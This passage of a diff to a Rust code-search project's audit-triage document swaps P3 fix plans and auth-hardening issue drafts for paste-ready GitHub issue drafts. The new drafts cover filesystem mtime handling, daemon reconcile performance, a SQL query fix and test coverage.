-let mut existing = store.get_embeddings_by_hashes(&hashes)?;
-for (i, chunk) in chunks.iter().enumerate() {
-    if let Some(emb) = existing.remove(&chunk.content_hash) {
-        cached.push((i, emb));
-    } else {
-        to_embed.push((i, chunk));
-    }
-}
+A successful spawn on any of the three is enough; bail on first
+success. Continue silently to the next on `Command::status()` failure.
+
+**Acceptance criteria:**
+- On WSL2 without `wslu` installed, `cqs serve --open` hands the
+  URL to the Windows default browser via `cmd.exe /c start ...`.
+- On WSL2 with `wslu` installed, `wslview` is preferred (cleaner
+  arg handling).
+- On native Linux, behavior is unchanged.
+- A unit test in `serve.rs::tests` (or a manual smoke checklist
+  documented in CONTRIBUTING.md) covers the three-path fallback.
+
+**Out of scope:**
+- Native macOS handling (`open` is already correct).
+- Windows handling (`cmd /C start "" "<url>"` already correct).
+- Detecting *which* Windows browser will launch.
 ```
 
----
+## P4-issue: PB-V1.30.1-5 — `events.rs` mtime-equality wrong on macOS HFS+ and SMB/NFS
+**Why an issue:** Cross-platform watch correctness. Touches the same predicate also addressed by EX-V1.30.1-6 (reconcile fingerprint) but on the inotify-event path. Should pair with that issue or land first since it's the smaller change.
 
-## P3.47 — `LocalProvider` worker thread stack 512 KB
+**Suggested labels:** `bug`, `tier-3`, `platform`, `data-integrity`
 
-**Finding:** P3.47
-**Files:** `src/llm/local.rs:163-256`
-**Why:** Default 2 MB stack × concurrency=64 = 128 MB just for the fan-out. Worker body is shallow.
+**Issue body draft:**
+```
+PB-V1.30.1-5: Treat any coarse-mtime FS as "always reindex on tie", not just WSL drvfs
 
-### Current code (sketch)
+`events.rs` mtime-equality skip (`src/cli/watch/events.rs:85-102`)
+toggles between strict `<` (WSL drvfs) and `<=` (everything else):
+
 ```rust
-std::thread::scope(|s| {
-    for _ in 0..workers {
-        s.spawn(|| { /* recv → http → parse → mutex.insert */ });
-    }
+let coarse_fs = cqs::config::is_wsl_drvfs_path(&path);
+let stale = state.last_indexed_mtime.get(rel).is_some_and(|last| {
+    if coarse_fs { mtime < *last } else { mtime <= *last }
 });
 ```
 
-### Replacement
-Switch to `Builder`-based threads with manual join, since `std::thread::scope::Scope::spawn` lacks a stack-size hook:
+Comment claims "On Linux/macOS we keep the original `<=` because
+sub-second mtimes there are reliable and equality genuinely means
+same content." This is true for ext4 / APFS / btrfs.
+
+It is **false** for:
+- HFS+ on macOS (1-second mtime resolution) — still common on
+  external drives, Time Machine restores, macOS < 10.14.
+- SMB/NFS shares mounted on Linux or macOS — typically 1-2 second
+  mtime resolution depending on server.
+- FAT32 USB / SD-card mounts on Linux.
+
+Two saves of the same file within the same second produce identical
+mtimes; the watch loop sees the second save's mtime equal to
+`last_indexed_mtime` and skips the reindex. The user's last edit
+silently doesn't make it into the index.
+
+**Current shape:** `src/cli/watch/events.rs:85-102` — `is_wsl_drvfs_path`
+is the only gate triggering strict `<`.
+
+**Proposed direction:**
+
+Replace the predicate from "is WSL drvfs" to "is the cached mtime
+within `coarse_fs_resolution()` of `mtime`":
+
 ```rust
-let mut handles = Vec::with_capacity(workers);
-for i in 0..workers {
-    let h = std::thread::Builder::new()
-        .name(format!("cqs-llm-worker-{i}"))
-        .stack_size(512 * 1024)
-        .spawn(/* worker closure */)?;
-    handles.push(h);
+fn coarse_fs_resolution(path: &Path) -> Duration {
+    if cqs::config::is_wsl_drvfs_path(path) { Duration::from_secs(2) }
+    else if is_macos_hfs(path) { Duration::from_secs(1) }
+    else if is_remote_mount(path) { Duration::from_secs(1) }
+    else { Duration::from_millis(0) }
 }
-for h in handles { let _ = h.join(); }
-```
-Adjust the captured borrows to be `Arc`-cloned since we're outside `scope`. Drop the upper concurrency clamp from 64 to 16 in `local_concurrency()` while you're there.
 
----
-
-## P3.48 — `LocalProvider::http`: cap idle pool
-
-**Finding:** P3.48
-**Files:** `src/llm/local.rs:97-100`
-**Why:** Default reqwest pool = unbounded idle, 90 s timeout. Long indexing runs leak idle slots into vLLM/llama.cpp.
-
-### Current code
-```rust
-Client::builder()
-    .timeout(timeout)
-    .redirect(Policy::none())
-    .build()?
+let stale = state.last_indexed_mtime.get(rel).is_some_and(|last| {
+    let resolution = coarse_fs_resolution(&path);
+    let delta = mtime.duration_since(*last).unwrap_or_default();
+    delta > resolution
+});
 ```
 
-### Replacement
-```rust
-Client::builder()
-    .timeout(timeout)
-    .redirect(Policy::none())
-    .pool_max_idle_per_host(self.concurrency)
-    .pool_idle_timeout(Duration::from_secs(30))
-    .build()?
+Treat any cached value within `coarse_fs_resolution` of `mtime` as
+ambiguous and force-reindex. Cheap conservative default; cost is at
+most one redundant reindex on rapid re-saves on fine-grained FS, vs.
+silent missed reindexes on coarse ones.
+
+**Acceptance criteria:**
+- HFS+, SMB, NFS path detection lands in a new helper.
+- Two saves within `coarse_fs_resolution` on a coarse-mtime FS
+  produce two reindexes, not one.
+- On ext4 / APFS / btrfs, behavior is unchanged (resolution = 0).
+- A unit test in `events.rs::tests` covers the predicate's
+  decision matrix using synthetic mtime/now/cached values.
+
+**Out of scope:**
+- Detecting per-FS resolution by `statvfs` flags or `f_frsize`
+  inspection (use mount-type heuristics).
+- Reconcile path mtime equality (covered by EX-V1.30.1-6).
+- Adding a `--strict-mtime` CLI flag (env var only if needed).
 ```
 
----
+## P4-issue: PF-V1.30.1-3 — Periodic GC and reconcile do back-to-back tree walks
+**Why an issue:** Performance refactor with shared cache between two callers; touches both gc.rs and reconcile.rs scheduling and needs verification that the shared HashSet doesn't change reconcile's mtime-comparison semantics.
 
-## P3.49 — `cmd_similar` (CLI) integration test
+**Suggested labels:** `enhancement`, `tier-3`, `performance`
 
-**Finding:** P3.49
-**Files:** `src/cli/commands/search/similar.rs:41`
-**Why:** Library `find_similar` is tested; the CLI wrapper (target lookup + pattern filter + JSON build) is not.
+**Issue body draft:**
+```
+PF-V1.30.1-3: Share `enumerate_files` walk between periodic GC and reconcile
 
-### Replacement
-Add to `src/cli/commands/search/similar.rs::tests` (or new `tests/cli_similar_test.rs` if `cmd_similar` is hard to drive in-process):
+When the daemon idles ≥ `daemon_periodic_gc_idle_secs()` (default 60s),
+both periodic GC and periodic reconcile may fire in the same tick:
+
+- GC's `Duration::from_secs(daemon_periodic_gc_interval_secs())`
+  (default 1800s) gates its walk.
+- Reconcile's `daemon_reconcile_interval_secs()` (default 30s) gates
+  the second walk.
+
+Their idle gates are identical, so on tick boundaries that satisfy
+both intervals, the daemon walks the entire working tree **twice in
+succession**, each walk doing per-file canonicalization through
+`dunce::canonicalize`.
+
+On a 17k-chunk corpus with ~3-5k unique source files on WSL `/mnt/c/`,
+each walk is ~1s wall (per the docstring on
+`DAEMON_RECONCILE_INTERVAL_SECS_DEFAULT`); doing it twice back-to-back
+is a 2s contention window every 30 minutes. Even when only one fires,
+both call paths build a `HashSet<PathBuf>` of disk files (gc.rs:211,
+reconcile.rs:84+95), so the same data is materialized twice in the
+same tick whenever both run.
+
+**Current shape:**
+- `src/cli/watch/mod.rs:1198-1283` — idle-tick gating + dispatch.
+- `src/cli/watch/gc.rs:209` — first `enumerate_files` callsite.
+- `src/cli/watch/reconcile.rs:74` — second `enumerate_files` callsite.
+
+**Proposed direction:**
+
+Lift the walk out of both call sites:
+
 ```rust
-#[test]
-fn cmd_similar_returns_other_seeded_chunks() {
-    let fix = common::InProcessFixture::new();
-    fix.seed_chunks(&[("foo", "fn foo() { bar(); }"),
-                      ("bar", "fn bar() { 1+1; }"),
-                      ("baz", "fn baz() { unrelated(); }")]);
-    let mut sink = Vec::<u8>::new();
-    let ctx = fix.command_context_with_json_sink(&mut sink);
-    cmd_similar(&ctx, "foo", /*limit*/ 2).unwrap();
-    let json: serde_json::Value = serde_json::from_slice(&sink).unwrap();
-    let names: Vec<&str> = json["data"]["results"].as_array().unwrap().iter()
-        .map(|r| r["name"].as_str().unwrap()).collect();
-    assert!(names.contains(&"bar"));
-    assert!(!names.contains(&"foo")); // self excluded
+// In the idle-tick block, before either GC or reconcile fires:
+let disk_files: Option<Arc<HashSet<PathBuf>>> = if gc_due || reconcile_due {
+    Some(Arc::new(enumerate_files(...)?.collect()))
+} else {
+    None
+};
+
+if gc_due {
+    run_periodic_gc(&store, disk_files.as_deref()...);
 }
-```
-
----
-
-## P3.50 — `cmd_ci` happy-path test
-
-**Finding:** P3.50
-**Files:** `src/cli/commands/review/ci.rs:9` + `tests/cli_train_review_test.rs` (or new `tests/cli_ci_test.rs`)
-**Why:** Existing tests cover error paths only; markdown formatting + exit-code mapping for a real diff are unpinned.
-
-### Replacement
-Add a test that feeds a real unified diff touching a hotspot function in an `InProcessFixture`-seeded corpus:
-```rust
-#[test]
-fn cmd_ci_high_risk_diff_emits_high_risk_section_and_nonzero_exit() {
-    let fix = common::InProcessFixture::new();
-    fix.seed_chunks(&[("hotspot", "fn hotspot() { /* many callers */ }")]);
-    fix.seed_callers("hotspot", 12); // synthetic call edges
-    let diff = "--- a/src/lib.rs\n+++ b/src/lib.rs\n@@ -1,3 +1,3 @@\n \
-                fn hotspot() {\n-    do_old();\n+    do_new();\n }\n";
-    let mut stdout = Vec::<u8>::new();
-    let exit = cmd_ci_with_input(&fix.context(), diff, &mut stdout).unwrap();
-    let out = String::from_utf8(stdout).unwrap();
-    assert!(out.contains("High-risk"));
-    assert_ne!(exit, 0);
-}
-```
-
----
-
-## P3.51 — `cmd_gather` (CLI) integration test
-
-**Finding:** P3.51
-**Files:** `src/cli/commands/search/gather.rs:77`
-**Why:** Library `gather()` is tested; CLI-only steps (`--max-files` clamp, content injection, token-budget trim) are not.
-
-### Replacement
-Add `tests/cli_gather_test.rs`:
-```rust
-#[test]
-fn cli_gather_clamps_max_files_and_injects_content() {
-    let fix = common::InProcessFixture::new();
-    fix.seed_chunks(&[/* 5 chunks across 5 files */]);
-    let out = cqs(&["gather", "needle", "--json", "--max-files", "2"]).output();
-    let json: serde_json::Value = serde_json::from_slice(&out.stdout).unwrap();
-    let groups = json["data"]["results"].as_array().unwrap();
-    assert_eq!(groups.len(), 2);                              // clamp
-    assert!(groups[0]["content"].as_str().unwrap().len() > 0); // content injected
+if reconcile_due {
+    run_daemon_reconcile_with_walk(&store, disk_files.as_deref()...);
 }
 ```
 
----
+Both already operate on the same set of disk files; the only daylight
+is reconcile checks each file's mtime and GC checks its existence —
+both derivable from one walk.
 
-## P3.52 — `dispatch_line` happy-path test for a valid command
+**Acceptance criteria:**
+- When both intervals fire on the same tick, only one
+  `enumerate_files` walk happens.
+- When only one fires, behavior is unchanged.
+- GC's `prune_missing` still operates correctly (consumes the
+  shared set).
+- Reconcile's mtime-comparison loop still operates correctly
+  (consumes the shared set + still calls `metadata()` per-file
+  for mtime).
+- A test in `gc.rs::tests` or `reconcile.rs::tests` asserts that
+  back-to-back invocations with `disk_files: Some(shared_set)` do
+  not call `enumerate_files` again.
 
-**Finding:** P3.52
-**Files:** `src/cli/batch/mod.rs:557` (`dispatch_line`); test block in same file
-**Why:** Existing tests are all error/adversarial. A success-envelope shape regression would slip through.
-
-### Replacement
-Add to `src/cli/batch/mod.rs::tests`:
-```rust
-#[test]
-fn test_dispatch_line_stats_emits_success_envelope() {
-    let fix = common::InProcessFixture::new();
-    let mut ctx = fix.batch_context();
-    let mut sink = Vec::<u8>::new();
-    ctx.dispatch_line("stats", &mut sink).unwrap();
-    let line = std::str::from_utf8(&sink).unwrap().lines().next().unwrap();
-    let v: serde_json::Value = serde_json::from_str(line).unwrap();
-    assert!(v["error"].is_null());
-    assert!(v["data"]["total_chunks"].is_number());
-}
+**Out of scope:**
+- Streaming the walk (covered by RM-5 P4-issue).
+- Changing the interval defaults.
+- Eliminating per-file `dunce::canonicalize` cost (separate fix).
 ```
 
----
+## P4-issue: PF-V1.30.1-8 — `indexed_file_origins` SELECT DISTINCT silent overwrite
+**Why an issue:** Subtle data-shape bug (silent overwrite when DISTINCT pairs differ on mtime) that needs a query rewrite plus a test pinning the deterministic-MAX behavior. Pairs with EX-V1.30.1-6 (fingerprint refactor) but is independently mergeable.
 
-## P3.53 — `select_provider` / `detect_provider` direct tests
+**Suggested labels:** `bug`, `tier-3`, `data-integrity`, `performance`
 
-**Finding:** P3.53
-**Files:** `src/embedder/provider.rs:171, 188, 258`; new `#[cfg(test)] mod tests` (overlaps P3.16; consolidate)
-**Why:** #1120's provider split has zero tests for the cache-on-first-call invariant or the priority list.
-
-### Replacement
-Add to `src/embedder/provider.rs::tests` (alongside the P3.16 tests):
-```rust
-#[test]
-fn select_provider_caches_first_call() {
-    // OnceCell semantics — first call wins, second returns same value.
-    let p1 = select_provider();
-    let p2 = select_provider();
-    assert_eq!(format!("{p1:?}"), format!("{p2:?}"));
-}
-
-#[cfg(not(any(feature = "cuda-index", feature = "ep-coreml", feature = "ep-rocm")))]
-#[test]
-fn detect_provider_returns_cpu_when_no_features() {
-    // Pure-CPU build must yield the CPU branch.
-    assert!(matches!(detect_provider(), ExecutionProvider::CPU));
-}
+**Issue body draft:**
 ```
-(Add a `cuda-index`-gated test that asserts CUDA selection on a CUDA build if the runtime has a GPU; otherwise skip.)
+PF-V1.30.1-8: Replace `SELECT DISTINCT origin, source_mtime` with `GROUP BY origin, MAX(mtime)`
 
----
+`indexed_file_origins` (`src/store/chunks/staleness.rs:627-637`)
+runs:
 
-# P4 — GitHub Issues (paste-ready)
+```sql
+SELECT DISTINCT origin, source_mtime FROM chunks WHERE source_type='file'
+```
 
-## P4.1 — AuthToken alphabet invariant via type-state
+and collects into `HashMap<String, Option<i64>>`. If a file's chunks
+were written across two upserts at different mtimes (a known edge
+case during partial reindex failures, or transient writes during a
+watch tick), `rows.into_iter().collect::<HashMap<_,_>>()` arbitrarily
+picks the **last** one in iteration order — silently dropping the
+earlier mtimes.
 
-**Disposition:** GitHub issue
-**Files:** `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:218-220` (`HeaderValue::from_str(&cookie).expect(…)`)
+From the reconcile caller's perspective, the wrong stored mtime
+causes either a missed reindex (if the chosen mtime happens to be
+≥ disk mtime) or a spurious one. Order is undefined per SQL spec —
+SQLite happens to be fairly deterministic but the contract isn't
+guaranteed.
 
-### Issue body (paste-ready)
+The DISTINCT also does extra work: it returns up to chunks-per-file
+rows when the caller wants one row per file. For a 17k-chunk corpus
+with 3k files at avg 5 chunks/file, that's 17k rows scanned and
+collapsed into a 3k-entry HashMap.
 
-**Title:** auth: harden AuthToken alphabet invariant via type-state, not docstring
+**Current shape:** `src/store/chunks/staleness.rs:627-637`.
 
-**Body:**
+**Proposed direction:**
 
-> `AuthToken::from_string` is currently `#[cfg(test)]` so production code cannot construct a token with arbitrary bytes. The contract that the alphabet is URL-safe base64 (and that `HeaderValue::from_str(&cookie)` therefore cannot fail) is enforced only by the docstring on `random()`. The `.expect(…)` at `auth.rs:218` is a real panic if the invariant ever fails.
->
-> If a future feature lifts the cfg-gate (e.g. "stable token from env var" for scripted automation) and the env var contains CR/LF, `;`, or `,`, the worker panics on every redirect or smuggles a second cookie pair into the `Set-Cookie` header. Today the path is unreachable from outside tests, but the type does not enforce the invariant; one cfg-gate change is all it takes.
->
-> **Why deferred:** a clean fix is a type-state refactor — wrap the inner `String` in a `pub struct AuthToken(String)` newtype constructed only via `random()` / a validated `from_str_validated`. Both constructors verify `[A-Za-z0-9_-]{32,}` and panic at construction, not at use. That changes the `pub` surface of the `auth` module and ripples into every test that builds tokens by hand.
->
-> **Pointers:**
-> - construction sites: `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:60-72` (`random`)
-> - panic site that would convert into a real safety proof: `src/serve/auth.rs:218-220`
-> - test usage to migrate: search `AuthToken::from_string` under `src/serve/`
+```sql
+SELECT origin, MAX(source_mtime) FROM chunks
+WHERE source_type='file'
+GROUP BY origin
+```
 
----
+- One row per origin.
+- Deterministic: returns the most-recent stored mtime, which is
+  the semantically correct value for reconcile's `disk > stored`
+  predicate.
+- Fewer rows materialized.
 
-## P4.2 — Path=/ cookie scope on 127.0.0.1 — multi-instance hijack
+**Acceptance criteria:**
+- Query returns exactly one row per (origin, source_type='file').
+- Returned mtime is the MAX across all chunks for that origin.
+- A test in `staleness.rs::tests` writes two chunks for the same
+  origin at different `source_mtime` values, asserts
+  `indexed_file_origins` returns the larger.
+- Reconcile tests pass without modification.
+- Eval R@5 unchanged (this is a metadata query, not a scoring path).
 
-**Disposition:** GitHub issue
-**Files:** `src/serve/auth.rs:211-214` (`Set-Cookie: cqs_token={token}; Path=/; HttpOnly; SameSite=Strict`)
+**Out of scope:**
+- Changing the `HashMap<String, Option<i64>>` return type to
+  `FileFingerprint` (covered by EX-V1.30.1-6).
+- Adding a content-hash column (covered by EX-V1.30.1-6).
+```
 
-### Issue body (paste-ready)
+## P4-issue: RM-2 — `wait_for_fresh` opens fresh socket every 250ms for up to 600s
+**Why an issue:** Resource-management refactor with two competing approaches (server-side wait via `tokio::sync::Notify` vs. client-side connection reuse). Needs design discussion before code; partly overlaps with PF-V1.30.1-2 and RB-9.
 
-**Title:** serve: localhost cookie collision when running multiple `cqs serve` instances
+**Suggested labels:** `enhancement`, `tier-3`, `performance`, `resource-management`
 
-**Body:**
+**Issue body draft:**
+```
+RM-2: Replace `wait_for_fresh` 250ms-poll with persistent connection or server push
 
-> Browsers scope cookies by `(host, path)` but **not by port**. Two `cqs serve` instances on the same machine but different ports (project A on 8080, project B on 8081) both set `cqs_token` with `Path=/`. Authenticating to one overwrites the cookie set by the other; the previously-authenticated tab silently 401s on every navigation, and (worse) any link sends the wrong token to the wrong server.
->
-> Threat model: an attacker who can convince a victim to run `cqs serve` against a malicious project on a port the attacker controls can drop any cookie they like into the victim's localhost cookie jar — combined with `SameSite=Strict`-bypass via top-level navigation, this is a real cookie-jar overwrite vector.
->
-> **Steps:**
-> 1. Run `cqs serve --port 8080` in project A; auth via the browser banner.
-> 2. Run `cqs serve --port 8081` in project B; auth via the browser banner.
-> 3. Reload project A's tab — every request now 401s because the project B token clobbered it.
->
-> **Why deferred:** clean fixes all have trade-offs. `__Host-` cookie prefix requires `Secure`, which loopback HTTP doesn't satisfy. Port-suffixed cookie names (`cqs_token_8080`) increase knob count and break URL-bar bookmarks across launches when the port floats. Path-rewriting (`Path=/api/__cqs_<port>/`) is heavy. Pragmatic option: derive cookie name from a hash of `(bind_addr, launch_time)` so two instances don't collide and a new launch invalidates the old cookie — but that changes the CLI launch banner (the printed token URL must include the cookie-name salt) and requires a one-time UX audit.
->
-> **Pointers:**
-> - cookie set: `src/serve/auth.rs:211-214`
-> - cookie read: `src/serve/auth.rs:158-172` (`check_request`)
-> - launch-banner path: `src/serve/mod.rs:111-117`
-> - existing acknowledgement of the issue: `src/serve/auth.rs:42-47`
+`wait_for_fresh` (`src/daemon_translate.rs:660-679`) is the shared
+client-side polling primitive for `cqs status --watch-fresh --wait`
+and `cqs eval --require-fresh`. Each iteration calls `daemon_status`,
+which opens a fresh `UnixStream::connect`, sets read/write timeouts,
+writes a 30-byte JSON request, reads a 64 KiB-bounded response, and
+drops the stream.
 
----
+With the default `--require-fresh-secs=600`, a stuck-stale tree
+triggers up to **2,400 socket connects + 2,400 JSON round trips** in
+a single eval gate. None of this is catastrophic — Unix sockets are
+cheap — but for a primitive that's now on the hot path of #1182 (the
+freshness gate), the cost shape is wrong.
 
-## P4.3 — `Option<AuthToken>` permits silent no-auth router
+On the daemon side, each connection: (1) wakes the accept loop's
+WouldBlock-poll thread, (2) spawns a *fresh OS thread* (per RM-1 —
+no thread pool), (3) takes the `BatchContext` mutex to dispatch
+`status`, (4) RwLock-reads the snapshot, (5) tears the thread down.
+Two concurrent `eval --require-fresh` runs (real scenario when an
+agent batch fans out) easily generate 4-5k connect-spawn-teardown
+cycles in a 60s wait.
 
-**Disposition:** GitHub issue
-**Files:** `src/serve/mod.rs:78-83` (`run_server` signature), `src/serve/mod.rs:154-178` (`build_router`)
+This issue subsumes PF-V1.30.1-2 (perf angle on the same code) and
+pairs with RB-9 (no-exponential-backoff angle, P3).
 
-### Issue body (paste-ready)
+**Current shape:** `src/daemon_translate.rs:660-679` (poll loop) +
+`:438` (per-call `UnixStream::connect`).
 
-**Title:** serve: type-state `AuthMode` to prevent silently building a no-auth router
+**Proposed direction:** Two complementary fixes — pick (a) for
+simplicity, or both for full eradication.
 
-**Body:**
+(a) **Persistent connection:** Keep the `UnixStream` open across
+    polls inside `wait_for_fresh` and reuse it for subsequent
+    `status` requests. One connect + N writes + N read_lines
+    until either fresh or timeout. ~30-line change confined to
+    `daemon_translate.rs`.
 
-> `run_server` and `build_router` both take `auth: Option<AuthToken>`. Passing `None` silently disables auth — there is no compile-time gate. The `cmd_serve` entry path correctly defaults to `Some(random())` and only opts into `None` on `--no-auth`, but the type does not constrain future internal callers (an embedded smoke test, a feature-gated dev mode, an alternate CLI surface) from passing `None` and shipping a fully open server. The only runtime signal is an `eprintln!` gated on `quiet == false` (`mod.rs:120-123`).
->
-> Today `run_server(store, addr, /* quiet */ true, /* auth */ None)` ships a wide-open server with zero output. The "default secure" property lives in convention, not in the type system. The equivalent invariant in `cqs ref add` is enforced by validate-by-construction; here it is not.
->
-> **Why deferred:** the clean fix is a type-state refactor — replace `Option<AuthToken>` with `enum AuthMode { Required(AuthToken), Disabled { ack: NoAuthAcknowledgement } }` where `NoAuthAcknowledgement` is a `pub` zero-sized type only constructable inside `cmd_serve` after the `--no-auth` flag is parsed. Future internal callers cannot instantiate the disabled variant without intentionally importing the proof type. This ripples into every test that builds a router today via `build_router(.., None)` and the public-ish `run_server` signature.
->
-> **Cheaper interim mitigation** (one-line, can land before the refactor): in the `None` arm of `build_router` add a `tracing::error!("serve: AUTH DISABLED — request layer is open")` so any caller (test or future) shows up loudly in journald. Not a substitute for the type-state fix; just blast-radius limiter.
->
-> **Pointers:**
-> - signature: `src/serve/mod.rs:78-83`
-> - router construction: `src/serve/mod.rs:154-178`
-> - the only caller that legitimately passes `None`: `src/cli/commands/serve.rs:61-65` (after `--no-auth` parse)
-> - banner suppression: `src/serve/mod.rs:120-123`
+(b) **Server-side wait:** Add a `status --wait <secs>` daemon
+    command that blocks server-side on a `tokio::sync::Notify`
+    flipped by the watch loop when `state` transitions to `fresh`,
+    then returns. One round-trip total instead of N. Bigger
+    daemon-side change but eliminates polling entirely.
 
----
+Both pair well with RB-9's exponential-backoff fix (300ms → 600 →
+1.2s → 2.4s with cap) for the case where polling is preferred.
+
+**Acceptance criteria:**
+- A 60-second stale-then-fresh wait produces ≤ 1 socket
+  connection (option a) or ≤ 2 (option b) — verified via a
+  test that counts mock `accept()` calls.
+- Existing tests
+  (`wait_for_fresh_returns_fresh_on_first_poll` etc.) pass.
+- A new test pins the connection-count contract.
+- `cqs eval --require-fresh` is no slower on the realistic
+  Stale → Fresh path.
+
+**Out of scope:**
+- Inotify-based push (separate design; option c in audit notes).
+- Daemon thread pool work (RM-1 is a separate finding).
+- Removing the `wait_for_fresh` helper entirely.
+```
+
+## P4-issue: RM-5 — Reconcile holds entire repo's filename set in RAM every 30s
+**Why an issue:** Resource-management refactor that touches `enumerate_files` shape (Vec → impl Iterator) and reconcile's loop shape; pairs with PF-V1.30.1-3 (shared walk) but is independently scoped. Needs design pass to avoid breaking GC's existing consumer.
+
+**Suggested labels:** `enhancement`, `tier-3`, `resource-management`, `scaling`
+
+**Issue body draft:**
+```
+RM-5: Stream `enumerate_files` walk; query indexed origins per-file in reconcile
+
+`run_daemon_reconcile` (`src/cli/watch/reconcile.rs:74-90`) runs every
+30s by default when the daemon is idle. Each tick:
+
+1. `enumerate_files(root, &exts, no_ignore)` returns a `Vec<PathBuf>`
+   materialized via `walker.collect::<Vec<_>>()` — the **entire**
+   tree's matching files in one allocation (lib.rs:618). For a
+   100k-file monorepo at avg 80 B/PathBuf, that's ~8 MB.
+
+2. `indexed_file_origins()` returns a `HashMap<String, Option<i64>>`
+   with one entry per indexed source file — typically ~30k entries
+   × ~120 B = ~3.5 MB.
+
+3. Both are held simultaneously through the loop body that does
+   set-difference and metadata() probes.
+
+Every 30s, ~12 MB allocated, walked, and dropped. Not a leak — the
+allocations are scoped — but it's repetitive heap churn the watch
+daemon pays *forever in idle*, and it doesn't scale: a 1M-file
+Chromium-class repo would hit ~120 MB transient per tick.
+
+#1182's whole-tree-walk-on-idle premise should not break on a
+1M-file repo.
+
+**Current shape:**
+- `src/cli/watch/reconcile.rs:74-90` — both materializations.
+- `src/lib.rs:618` — `enumerate_files` returns `Vec<PathBuf>`.
+
+**Proposed direction:**
+
+Stream the disk walk: change `enumerate_files` to expose
+`enumerate_files_iter(root, exts, no_ignore) -> impl
+Iterator<Item = anyhow::Result<PathBuf>>`. The Vec-collecting
+version stays as a thin wrapper for callers that genuinely need
+the count.
+
+In reconcile, switch `for rel in disk_files` to consume the iterator
+directly, prepared-statement-querying `chunks.source_mtime WHERE
+origin = ?` per file (or chunked in 1k batches) instead of
+pre-loading the full `indexed` HashMap. Memory drops to
+O(batch_size) regardless of repo size, and the walk + DB lookups
+overlap in time.
+
+**Acceptance criteria:**
+- `enumerate_files_iter` exists and the existing
+  `enumerate_files` is its `.collect::<Vec<_>>()` wrapper.
+- Reconcile peak memory drops to O(batch_size) — verified via
+  a synthetic 100k-file tempdir test that asserts steady-state
+  RSS doesn't grow with file count.
+- Per-file SQL lookup batched in groups of 1k via a prepared
+  statement; not 100k individual `fetch_one` round trips.
+- Reconcile correctness tests
+  (`reconcile_detects_bulk_modify_burst` etc.) pass.
+- GC and other `enumerate_files` consumers are unchanged.
+
+**Out of scope:**
+- Sharing the walk between GC and reconcile (covered by
+  PF-V1.30.1-3).
+- Adding a memory budget knob (env var). Streaming is the
+  budget.
+- Eliminating per-file `dunce::canonicalize` in the walk
+  (separate concern).
+```
+
+## P4-issue: TC-HAP-1.30.1-6 — `process_file_changes` zero direct tests
+**Why an issue:** Test-infra work; the function is the central watch-loop reindex path and "no direct tests" maps to "needs a test harness with a stub embedder" — that scaffolding is the actual work. Hard because the function takes an embedder, store, and config and spans the entire pending-files drain path.
+
+**Suggested labels:** `tests`, `tier-3`, `test-coverage`
+
+**Issue body draft:**
+```
+TC-HAP-1.30.1-6: Add direct tests for `process_file_changes` watch-loop drain
+
+`process_file_changes` (`src/cli/watch/events.rs:131-300+`) is the
+function the watch daemon calls every cycle to drain `pending_files`
+into the index. It has zero direct tests.
+
+`grep -rn process_file_changes src` returns three production call
+sites in `watch/mod.rs` (lines 1125, 1254, 1276) and zero test sites.
+The `reconcile.rs::tests::reconcile_detects_bulk_modify_burst` test
+exercises *queueing* into `pending_files`, then asserts the snapshot
+reads Stale — but never invokes `process_file_changes` to drain it.
+So the canonical "queue → drain → snapshot reads Fresh" round-trip
+is not an end-to-end test in the suite; both halves exist, only the
+seam is untested.
+
+Critical untested paths:
+- The `try_init_embedder` Err arm (already flagged as EH-V1.30.1-8)
+  silently returns without clearing dirty flags.
+- The `dropped_this_cycle > 0` warn arm (line 139-145) — pairs with
+  CQ-V1.30.1-1 P1 fix.
+- The println! gating on `cfg.quiet` (line 147) — pairs with
+  OB-V1.30.1-9.
+
+**Current shape:** `src/cli/watch/events.rs:131-300+`. Production
+function with three production callers and zero tests.
+
+**Proposed direction:**
+
+Build a stub-embedder test harness in `events.rs::tests` (or move
+the tests to `cli/watch/mod.rs::tests` if that's where embedder
+fixtures already live). Tests to add:
+
+(1) `process_file_changes_zero_files_is_noop` — empty
+    `pending_files`, run, assert `state.pending_files.is_empty()`
+    and no panics, no embedder init.
+
+(2) `process_file_changes_single_file_drains_into_index` — seed
+    one Rust file in a tempdir, push its rel path into
+    `pending_files`, run with a stub embedder (existing
+    `placeholder_embedding` helper from reconcile tests), assert
+    (a) `state.pending_files` is empty after, (b) `store.search`
+    returns the new chunk.
+
+(3) `process_file_changes_reports_dropped_warn_once_then_resets`
+    — set `state.dropped_this_cycle = 5`, run, assert
+    `state.dropped_this_cycle == 0` after (this pins the
+    reset-after-warn semantic the audit's CQ-V1.30.1-1 P1 fix
+    will fix the *ordering* of).
+
+(4) `process_file_changes_handles_embedder_init_error` — stub
+    that returns Err from `try_init_embedder`, assert
+    `state.dropped_this_cycle` is preserved (not reset),
+    `state.pending_files` is preserved.
+
+The embedder stub probably already exists in
+`cli/watch/reconcile.rs::tests` (`placeholder_embedding`). Reuse it.
+
+**Acceptance criteria:**
+- Four (or more) direct tests in `events.rs::tests` covering
+  the four cases above.
+- Coverage for the `try_init_embedder` Err path validated by
+  test failures when EH-V1.30.1-8's intended fix lands.
+- Tests run in <1s; no real embedder loaded.
+- `cargo test --features cuda-index events::` passes.
+
+**Out of scope:**
+- Adding production tracing to `process_file_changes` —
+  separate observability work (OB-V1.30.1-9 P3).
+- Refactoring `process_file_changes` into smaller subfunctions
+  (only refactor when tests force it).
+- Integration tests that drive the full daemon loop —
+  separate scope.
+```
+
+## P4-issue: DS-V1.30.1-D3 — Periodic reconcile reads through stale `store` handle
+**Why an issue:** Race-condition fix that needs explicit `db_file_identity` check before each periodic reconcile (matching the pattern at `mod.rs:1105`); medium effort since it touches the watch loop's hot path.
+
+**Suggested labels:** `bug`, `tier-3`, `data-integrity`, `concurrency`
+
+**Issue body draft:**
+```
+DS-V1.30.1-D3: Add db_file_identity check before periodic reconcile fires
+
+The periodic reconcile path (`src/cli/watch/mod.rs:1262-1283`) skips
+the `db_file_identity` check that `should_process` does at line 1105.
+
+If `cqs index --force` rotated the DB while the watch loop was idle,
+periodic reconcile fires, calls `run_daemon_reconcile(&store, ...)`
+against the stale store handle (orphaned inode), and reads
+`indexed_file_origins()` + `source_mtime` from the OLD DB. Files that
+got newer mtimes in the NEW DB look "stale" against the old store;
+reconcile queues them as MODIFIED. The next `should_process` cycle
+reopens the store, drains those queued paths, and re-embeds files
+that were already current in the new DB.
+
